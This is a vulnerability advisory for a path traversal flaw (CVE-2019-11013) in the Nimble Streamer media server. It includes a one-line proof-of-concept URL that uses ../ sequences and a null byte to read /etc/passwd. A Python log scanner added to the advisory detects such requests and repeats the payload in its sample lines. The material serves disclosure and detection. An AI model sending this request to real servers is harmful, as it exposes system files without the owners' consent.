Vendor: Nimble Streamer
By: MAYASEVEN
CVSS: 6.5 (MEDIUM)
CWE: 22 (Path Traversal)
Product Name: Nimble Streamer
Affected Version From: 3.0.2-2
Affected Version To: 3.5.4-9
Patch Exists: YES
Related CVE: CVE-2019-11013
CPE: Nimble Streamer
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Tested on 3.5.4-9
2019

Nimble Streamer 3.0.2-2 to 3.5.4-9 – Path Traversal

Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server.

Mitigation:

Restrict access to the vulnerable directory and ensure that the directory is not accessible from the web.

Exploit-DB raw data:

# Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
# Exploit Author: MAYASEVEN
# Source at "https://mayaseven.com/nimble-directory-traversal-in-nimble-streamer-version-3-0-2-2-to-3-5-4-9/"
# Published on 08/04/2019
# Vendor Homepage at "https://wmspanel.com/nimble"
# Affected Version 3.0.2-2 to 3.5.4-9
# Tested on 3.5.4-9
# CVE-2019-11013 Nimble Streamer 3.0.2-2 to 3.5.4-9 Path Traversal
# Description: Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability.
#              Successful exploitation could allow an attacker to traverse the file system to access
#              files or directories that are outside of the restricted directory on the remote server.


POC :
 - http://somesite.com/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
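
A defender-side check for the request shape shown in the PoC above, added here as an example and not part of the original advisory or the vendor's code: it percent-decodes each logged request path (including double encoding) and flags NUL bytes and `..` path segments. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def traversal_indicators(target):
    """Return the reasons a request target matches the pattern in this advisory."""
    path = decode_fully(urlsplit(target).path)
    reasons = []
    if "\x00" in path:                       # encoded NUL used to cut off the suffix
        reasons.append("nul-byte")
    if ".." in re.split(r"[/\\]", path):     # whole ".." segment, not "my..video"
        reasons.append("dot-dot-segment")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every log line whose request is suspicious."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            reasons = traversal_indicators(match.group(1))
            if reasons:
                hits.append((number, reasons))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Apr/2019:10:00:00 +0000] "GET /demo/file/playlist.m3u8?nimblesessionid=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [08/Apr/2019:10:00:01 +0000] "GET /demo/file/../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1" 200 1024',
    '192.0.2.12 - - [08/Apr/2019:10:00:02 +0000] "GET /demo/file/%252e%252e/%252e%252e/x%2500a.mp4/chunk.m3u8 HTTP/1.1" 404 0',
    '192.0.2.13 - - [08/Apr/2019:10:00:03 +0000] "GET /demo/file/my..video.mp4/chunk.m3u8 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(number, ",".join(reasons))
```

A 200 response on a flagged line, as in the second sample entry, is the case to triage first on hosts running an affected version.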